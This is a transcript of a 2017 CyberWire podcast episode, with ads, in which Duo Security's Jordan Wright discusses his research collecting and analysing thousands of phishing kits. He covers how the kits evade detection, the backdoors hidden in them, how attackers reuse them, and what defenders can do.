CyberWire Daily - Exploring Phishing Kits with Duo Security's Jordan Wright. [Research Saturday]
Episode Date: November 4, 2017In this episode of the CyberWire’s Research Saturday we are joined by Jordan Wright, Senior Research and Development Engineer at Duo Security. He’s the author of the research report, “Phish in a... Barrel,” which describes his work gathering and examining thousands of phishing kits from around the web. Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
Discussion (0)
You're listening to the Cyber Wire Network, powered by N2K. data products platform comes in. With Domo, you can channel AI and data into innovative uses that
deliver measurable impact. Secure AI agents connect, prepare, and automate your data workflows,
helping you gain insights, receive alerts, and act with ease through guided apps tailored to
your role. Data is hard. Domo is easy. Learn more at ai.domo.com.
That's ai.domo.com.
Hello, everyone, and welcome to the CyberWire's Research Saturday.
I'm Dave Bittner, and this is our weekly conversation with researchers and
analysts tracking down threats and vulnerabilities and solving some of the hard problems of
protecting ourselves in a rapidly evolving cyberspace. Thanks for joining us.
And now, a message from our sponsor, Zscaler, the leader in cloud security.
Enterprises have spent billions of dollars on firewalls and VPNs, yet breaches continue to rise by an 18% year-over-year increase in ransomware attacks
and a $75 million record payout in 2024.
These traditional security tools expand your attack surface
with public-facing IPs that are exploited by bad actors
more easily than ever with AI tools.
It's time to rethink your security.
Zscaler Zero Trust plus AI stops attackers
by hiding your attack surface,
making apps and IPs invisible,
eliminating lateral movement,
connecting users only to specific apps,
not the entire network,
continuously verifying every request
based on identity and context,
simplifying security management
with AI-powered automation,
and detecting threats using AI
to analyze over 500 billion daily transactions.
Hackers can't attack what they can't see.
Protect your organization with Zscaler Zero Trust and AI.
Learn more at zscaler.com slash security.
So I have quite a bit of a background in terms of fishing.
It's always been a hobby of mine and an area of interest.
Jordan Wright is a senior research and development engineer at Duo Security.
He's the author of the research report, Fish in a Barrel.
My first exposure to fishing kits was a couple years ago,
whenever I was doing some just high-level independent research around fishing in general,
and I came across a fishing kit almost by accident.
I found the kit, downloaded it, analyzed it, and realized maybe this is something that could be looked at at scale.
You know, if we did this for thousands of fishing URLs, not just a one-off kind of approach.
But as time goes, you know, it always was kind of put on the back burner in terms of
projects.
And whenever I was looking at areas to investigate for Duo, this came up and really just struck
an area of interest.
I knew this was something that I wanted to look at.
We had the resources and time to look at it, which resulted
in this project. So before we dig into the actual research, can you give us a sense for the
landscape? I mean, what is the state of fishing these days? Sure. Fishing is absolutely on the
rise. There was a report given out quarterly last year during 2016, there's an organization called the Anti-Fishing Working Group,
and they consist of multiple organizations who all come together to share research, share data, and to try to combat fishing as a whole.
And so they release quarterly reports that indicate the state of fishing and how often fishing sites are being seen.
how often fishing sites are being seen. And what we found in 2016, the number of unique fishing sites seen in a given quarter, we broke the record. And we broke that record twice in 2016,
first in Q1 and then in Q2. To give you an idea of the kind of scale that we're talking about,
in Q2, there were over 460,000 unique fishing sites seen just in that quarter.
To kind of break that down into a different number, that's over 5,000 unique fishing sites seen per day.
It's clear that we need to start thinking in terms of at-scale approaches to mitigate fishing.
We need to analyze this as a bigger problem than just trying to hit one-off phishing sites and try to keep up and
play whack-a-mole every day. So these numbers are not only growing, but they're growing to a level
where we're having to start taking different approaches. Take us through how a typical
phishing kit works. To give a bit of background on why phishing kits are even important at all,
we have to remember this is a business. For attackers, like any business person, their goal is to maximize the return on investment. And so the
entire idea around phishing kits is how can I make my phishing campaigns as efficient and cheap as
possible? Because if I can do that and I can start harvesting credentials, then my return on
investment is higher. And so what they'll do is they'll start by figuring out what site do I want to spoof. Let's say it's Facebook or Office
365 or Gmail, you name it. They'll figure out the site that they want to clone. They'll download
local copies of all that site's resources. This includes the HTML, the images, the style sheets,
everything that they need to host a local copy of that website. And then the HTML, the images, the style sheets, everything that they need to host a
local copy of that website. And then they'll change the login form to point to a script that they
control. Typically, this is a short PHP script that does nothing more than collects those credentials.
And it almost ironically emails them to the attacker saying, I received these credentials
from this phishing
campaign. After an attacker has all these resources in this script, they'll bundle these up together
into a zip file, and then they'll figure out where do I want to host my next phishing campaign.
But this zip file is the phishing kit. This has everything they need to run the campaign.
So they'll look out and they'll find, let's say, typically a compromised CMS instance, like a WordPress instance, and they'll exploit an out-of-date plugin or an out-of-date theme to get access to upload their phishing kit onto that server.
So they'll upload the zip file, they'll extract the files, and then they have a working phishing site on this hacked website.
From there, they'll send out emails pointing to their new website, and they're off to the races.
Now, the hacked website that they load their files onto, would the person running that site
even be aware that this phishing kit might be living on their site?
It really depends. It depends a lot on the monitoring that they have enabled. Traditionally,
what would likely happen is after phishing campaigns and after phishing emails are starting
to be sent out, the abuse reports would start rolling in. Security companies would start
detecting these sites and trying to shut them down. They'll send notices to the registrar,
who in turn will let the person running and operating that website know so that they can
try to go and clean up those efforts.
And the people who've fallen victim to this, they might not even know that they've given up their credentials.
You're absolutely right.
And this is where phishing kits can be really sneaky.
So after I've put in my credentials, the last trick up a phishing kit's sleeve is that it's going to redirect me to the legitimate website.
Because at this point, it has my credentials.
It doesn't need anything else.
And so by redirecting me to the legitimate login form,
as a user, I just feel, I guess I put in my credentials wrong.
I guess I must have done something different or the site didn't work.
There was an error.
But either way, now if I look up in the address bar or the URL bar,
I see the legitimate website.
I don't think anything happened.
So there's not even any sense that something's gone wrong and I have a good feeling I've gotten where I wanted to go.
And meanwhile, my credentials have been sent off to the bad folks.
Exactly. You know, this catches people just trying to live their daily lives, trying to do daily business.
And so they would just chalk this up to say, I guess something went wrong. I'll log in again and move forward.
So let's go through, how did you start tracking down these phishing kits?
So it all starts with knowing what to look for. And this came from my previous research into this
individual phishing kit, which is knowing some different tricks and kind of relying on attackers
being lazy and leaving these kits behind. Because that's really the whole reason this
research was possible, is that whenever these files are extracted, they don't always delete
the original zip file. And that's what we're targeting. If we can download that zip file,
we can analyze the code inside of it, including the email address
that these credentials are being sent to, as well as what information is being collected.
And so we started by trying to figure out what are the best ways that we can track down this zip
file. And there are two ways that we came across. The first is looking for what we call directory
indexes or directory listings. In web servers,
it's commonly the case that they'll say, if you request a URL that ends with a slash,
so indicating a folder, I would know what page to serve you. Say that's index.html or index.php,
because I'm presuming that that file is going to be present in every folder.
If it's not, which is commonly the case with these phishing kits,
web servers can fall back and say,
I'm just going to give you a listing of all of the contents in the directory.
This includes all the file names that I have in this folder.
One of these file names would be the zip file.
So that makes it really
clear and easy for us to say there's a phishing kit, even if it's not the same name as the
extracted contents. You know, let's say they called their phishing kit office365phishing.zip
and the folder is just in the URL, you would just see office365. That's a really quick way for us to for sure get phishing
kits if they're left on the server. But directory indexing and directory listing is configurable,
and it's not always available. In our research, we found that it was available about 23% of the time.
So it's a good amount, but it's not 100% reliable. And so we had to look at another method, which is, again, relying on
attackers being lazy in naming the zip file the same name as the extracted folder. So if they
named their zip file Office 365.zip, and then they unzip those files into Office 365, the folder,
zip those files into Office 365, the folder, all we have to do is just work our way up the URL,
replacing every slash with.zip. And then if that phishing kit is there, we can download it.
And so you gathered up quite a number of URLs. Take us through that part.
We did. So we sourced our URLs from two different places. These are both community-driven feeds where anyone can go and submit a phishing URL
to these feeds,
which then in turn work with different security companies
to try to shut them down.
The first is called Phish Tank,
and they're run by OpenDNS.
And the second is called OpenPhish.
So we took both of these feeds
and we watched them for a month.
And over the course of a month,
we analyzed over 66 course of a month, we analyzed
over 66,000 fishing, possibly fishing URLs. I say possibly because anyone can upload any URL they
want. So it's not a guarantee that all of these are fishing, but a majority of the time they are.
So after we analyzed all 66,000 of these URLs, we downloaded over 3,200 unique phishing kits. What's some of
the data that you were able to gather from all of those unique phishing kits? That was the next step.
We have this huge corpus of data and we need to figure out what does it mean? What's the
significance? What can we learn from it? And this is where we started digging in. The first interesting thing that
we found was that attackers are pretty good, or at least are trying to evade detection from
security companies. The way this works is that it's a cat and mouse game. Attackers will stand
up a new phishing site, they'll send out emails, and they know that security companies are always
looking to locate their phishing site and to shut it down.
And so it's to their advantage.
Remember, this is all return on investment for them to try to keep their phishing site available and up as long as possible.
So there's a couple of things that they'll do to try to keep that level of persistence.
The first is that they'll use a file called an HT access file.
This is something that is specific to the Apache web server
and it's a file that lets administrators tell Apache,
here are the connections that I want you to allow or deny.
And you can do this based on any number
of interesting attributes like the user agent
or the IP address or the domain
that they're claiming to come from. And so attackers will use these HD access
files to put in the information about security companies. They'll say I want
you to deny connections from these IP addresses which are known to belong to
this security company or I want you to deny connections from this user agent,
which is known to be a crawler from this other company.
And by doing this, they can try to hide a little bit.
They can try to evade this detection,
where if a company is going and looking for these websites,
if they're using the infrastructure that this htaccess file is designed to block,
they wouldn't see the site.
It would be kind of hidden from view.
This was really common.
This was really prevalent in all the kits that we found.
And we found over 185 different unique HT access files.
So this shows that there's definitely a level of information sharing
between attackers.
They'll kind of piecemeal different, you know,
one piece of IP addresses from this file that I found, some user agents from this one, and they'll
kind of mix and match, but they're all doing the same thing. And this is the same technique and the
same idea that they'll use in a different way. So another detection or another evading technique that they'll use
is by creating PHP scripts, which do the basic same thing that the HT access files do.
And they're designed to block connections based on any number of HTTP request attributes. Again,
the user agent, IP address, you name it. But this is where things kind of got interesting.
As we're looking through these PHP scripts to try to see what it is that they're trying
to block or allow, we came across something really interesting, which is that we found
multiple PHP scripts that had a hidden backdoor.
This backdoor allows anyone, if you know what parameter to put on the end of the URL, to
execute whatever system command you want.
So this kind of falls back on the phishing being an economy.
In addition to attackers standing up their own campaigns,
there's an entire economy around sharing, selling, trading phishing kits between one another.
So one attacker may create a phishing kit and then trade or hand it off to any number of
other attackers for use in their own campaigns. But it seems like some enterprising attackers,
maybe people who wanted to get a little bit of access without really putting in the work,
decided to put these hidden back doors into these files as a way to kind of maintain that
persistence, as a way to maintain that control that persistence, as a way to maintain that control
and still have access to servers to host that they didn't take any part in compromising in
the first place. These backdoors, we kind of expected to see a couple of them from previous
work that had looked at similar situations in the past. But what really surprised us was the scale
of the backdoors that we came across. The particular backdoor that you'll find in our report,
that unique string was seen over 200 times, indicating this is surprisingly common.
You know, these kits are being traded and used very frequently, but many of them are
backdoored, letting anyone, including other attackers or security researchers or really
anyone who would like to access these hosts can do so through these backdoors very, very easily.
Do you think with that many backdoors being out there that it's a matter of, I don't know,
almost a cost of doing business for the folks who are putting these out there that they're they're you know
the stuff still works for them but in exchange these back doors allow other people to take
advantage of the work they've done that's a really good insight that's that's absolutely possible
you know we we have to remember that this is all about quantity not quality you know they're
attackers know that their phishing sites will
be shut down relatively quickly. There's a lot of people looking for these and they're doing a very
good job of finding and shutting down these phishing sites. And so it may be the case that
attackers realize the trade-off of analyzing every file in their kit for any kind of backdoor.
Like you said, it may just not be
worth it. It may be a cost of doing business. It may just say, I'm here to get my credentials as
quickly as possible, and then I'm out. I'm going to go somewhere else.
You also discovered a lot of reuse with these kits.
Yes. After we analyzed the contents of the kits themselves, we wanted to figure out,
what does the landscape look like for these fishing kits? Where are they being used? Can we identify two sets of problems? The first is
can we identify unique fishing kits that are used in more than one place? Because this would
indicate the same attacker running multiple campaigns and compromising multiple hosts.
And we did. We found that in our month span, most of the phishing kits
that we came across were seen once. But 27% of the phishing kits that we found, about 900 of them,
were seen in more than one place. In fact, a couple of the phishing kits that we've seen
were found on more than 30 unique hosts, indicating that attackers had compromised
30 different web servers and ran 30 different campaigns
all in the course of a month, which is pretty active.
These are very active attackers,
constantly running new campaigns.
And so being able to track this reuse
gives really valuable insight to security researchers because
they can start tracking actors in different places using very simple techniques that we show in the
paper. The second problem, the second area that we wanted to map, and this is another area where
it gets really interesting, is can we track attackers across different phishing kits. So the way that we decided this phishing kit is unique
is that we took a hash of it, which means we shorten it down to a set of characters,
which guarantee that it's a unique identifier across our data set. So this means all of the
content in that kit, including the email address of the attacker where credentials
are being sent, is bundled into that hash. So if that email address or any other content changes,
that hash will be different. And so we took all these hashes, and then we also took it another
step further, and we extracted every email address we saw in the kits. And then we mapped all those out, which email addresses are found in which hashes,
which unique phishing kits.
And that's the map that people will find on, I think it's page 12,
where we talk about tracking actors across kits.
And here's kind of a, it gets even more interesting.
We talk about having an email address for where the credentials are being sent to,
but there's another kind of interesting part about it,
which is whenever attackers create these phishing kits,
they want to leave kind of a signing card.
They want to leave a note that says,
this person created this phishing kit almost to get credit for it.
A typical place that they'll put their email address
is as the from address. So whenever you send an email, it has to have a from address.
Well, the email containing the stolen credentials is generally going to be sent from an email
address that's the signing card for the person who made the kit. So what this means is that if
I create a phishing kit and I put my email address as that signing card,
I give it to another attacker.
They go and they run multiple campaigns.
Both my email address and that attacker's email address
will be associated through that phishing kit.
So we can take all of these email addresses,
both sender and recipient,
and all of these kits and we can map them out.
And then we result in an incredible landscape where we can see here's probably who created all these kits.
Here's all the kits that they're associated with.
And then here are the people using those kits.
And then here are the URLs those are being used at.
using those kits. And then here are the URLs those are being used at. So you can, at a glance,
see the entire ecosystem and the landscape of what phishing attacks are being launched and who's behind them. And so being able to have that view of this ecosystem,
what kind of information were you able to gather from that?
One interesting finding that we came across was a single email address was found in more than 115 unique phishing kits. Now, this email address
was used, like we talked about, as that signing card, as that from address, which indicates that
this actor who created this kit distributed it to any number of people,
or they got their hands on it somehow and started using it.
But seeing this wide of a scale in such a short time frame
shows that the kits created by this alias are very common.
And the kits that we found weren't just, it wasn't just one kit for one service.
We found kits with this actor's email address for almost every service
provider, Gmail, Office 365, you name it. So it's not just one single attack vector.
The people creating these kits are making them for any number of different services
before they distribute them. And what else can you learn about the overall ecosystem? Is this
a situation where you have a handful of
kingpins who are then distributing the software to workers below them who are doing the dirty work,
or is it more distributed than that? Is there any sense for that sort of thing?
I'd say there's a healthy mix of both distributors, people who make either full
kits themselves or just components of them. Maybe they just make the credential stealing script
and then they distribute that and say,
you're gonna have to clone your own pages,
but you can use this script to send out the emails.
And then there's also the side of people
who are more DIY in terms of creating their own fishing kits.
The barrier to entry in this type of attack
is very, very low.
That's why it's so common, because it's easy and cheap to get into,
and it still yields incredible results in terms of the effectiveness of fishing in general.
So this landscape is still pretty distributed,
but it does have that healthy mix where we see both sides of the story.
For those who are trying to defend against these sorts of things, these phishing attacks, what advice do you have for them?
Absolutely. So this is an area that we're really excited about because we took all the code that
we use to run this experiment and we're open sourcing it. We're making it freely available
on GitHub for anyone to download it and try to replicate our results for their own organization.
anyone to download it and try to replicate our results for their own organization. They can put in phishing URLs that they're seeing against their own user base to try
to track down the phishing kits behind them.
And this gives admins a really good look at what information is being captured, as well
as who's behind the attack, where these credentials are being sent.
There's also the opportunity to partner up with different mail providers to where we can say, we've come across a phishing kit that's sending credentials to this
email address. You may wish to shut this down as an attacker's account. So by having this
information, we can start to have a much more full and rich incident response process that lets us
take active measures on these phishing attacks as they occur.
Is there the possibility of automating the response to these sorts of things?
That would be kind of taking this research to the next step, which is now that we have the ability
to download this data in bulk and almost in a streaming fashion, could we somehow develop
automated measures to respond to the
emails that we find, to the phishing URLs that we find? There's a pretty good amount of automation
being built in to respond to phishing URLs that are found. So these would be threat feeds that
hook into popular products. Or a really good example is Google's Safe Browsing, which is
built into the Google Chrome web browser, where as soon as they know about a confirmed phishing site, they'll add that to a global block list where whenever you try to navigate to that website, Chrome will tell you this is a known phishing site.
You may be in a phishing attempt.
You may wish to go somewhere else at this point, which is a really effective way to get widespread protection
for consumers. And so the type of automation around phishing URLs is pretty strong, but there's
a level of automation that we could introduce around what do we do now that we know the
attackers behind these campaigns? Can we, you know, kind of like we mentioned earlier, can we work
directly with mail providers to send them the stream of email addresses if they don't already have them,
indicating that they were known to be found in fraudulent phishing campaigns,
where they could shut down those accounts even easier.
And once the account is shut down, any phishing credentials sent to that email address
wouldn't be collected and couldn't be used for further fraud.
email address wouldn't be collected and couldn't be used for further fraud.
So at Duo Security, you have some tools that help people test their ability to stand up to these phishing attacks. And through that, you all get some interesting statistics.
What can you share with us about that?
Sure. So we do have a free tool called Duo Insight. And what it does,
it allows organizations to test their own exposure to phishing completely
free.
So they can set up a campaign with popular phishing pretexts and see how likely it is
that their users would open, click, or even submit credentials to fake phishing sites.
And so we're always collecting anonymous statistics about how effective our phishing campaigns
are. And recent statistics show that
over the course of testing about 150,000 recipients, we find that 45% of recipients
open the email and 24% of recipients click the link. And at this point, it's important to take
a step back and say this could already be game over in some aspects because we hear about browser plug-in vulnerabilities like Flash or Java.
If those are out of date, it's easy for attackers to stand up malicious websites, which then compromise those plug-ins and install malware on the system.
And so even clicking the link can be pretty disastrous if we're not keeping our software up to date.
And taking that a step further, we found that 13% of recipients actually go to the next step and enter their credentials into the fake phishing site.
To kind of take that from a different angle, we found that 63% of campaigns were successful in capturing at least one credential.
So it shows that we talk about phishing being cheap, and it's getting even more effective with the use of phishing kits, but it's also very effective as
a practice. It's very effective as a measure to gain access to sensitive data or gain access to
accounts or systems if more than half of your phishing campaigns are going to receive a
credential. That's a really good return on investment. It shows why it's so important to really study and try to protect against the
fishing landscape. What is your sense as to where we are in terms of facing this thread? Are we
gaining? Are the fishing people doing better with us or are we doing a better job of shutting them
down? I've seen, especially in recent years, there's been multiple companies
that have done incredible work at taking on phishing from a wider scale. I mentioned Google
Safe Browsing, and that's a perfect example of Google realizing that they can help protect a
large user base of anyone who uses Chrome against phishing sites very, very quickly. So we're making really good strides in terms of trying to protect against the increased
number of phishing sites that we see, but it's still safe to say that we have room to
grow.
We have room to continue doing better, to continue studying these attacks and trying
to figure out what protections can we put in place to try to thwart them.
But as a whole, you know, security companies
and browser makers are doing a good job of trying to combat a threat and take it head on,
which is always encouraging to see. Our thanks to Jordan Wright from Duo Security for joining us.
You can find the complete report, Fish in a Barrel, in the blog section of the Duo Security website.
Cyber threats are evolving every second, and staying ahead is more than just a challenge.
It's a necessity.
That's why we're thrilled to partner with ThreatLocker, a cybersecurity solution trusted by businesses worldwide.
ThreatLocker is a full suite of solutions designed to give you total control,
stopping unauthorized applications, securing sensitive data,
and ensuring your organization runs smoothly and securely.
Visit ThreatLocker.com today to see how a default deny approach can keep your company safe
and compliant. The Cyber Wire Research Saturday is proudly produced in Maryland out of the startup
studios of Data Tribe, where they're co-building the next generation of cybersecurity teams and
technologies. Our amazing Cyber Wire team is Elliot Peltzman,
Puru Prakash, Stefan Vaziri, Kelsey Bond,
Tim Nodar, Joe Kerrigan, Carol Terrio,
Ben Yellen, Nick Valecki, Gina Johnson, Bennett Moe,
Chris Russell, John Petrick, Jennifer Iben, Rick Howard,
Peter Kilpie, and I'm Dave Bittner.
Thanks for listening.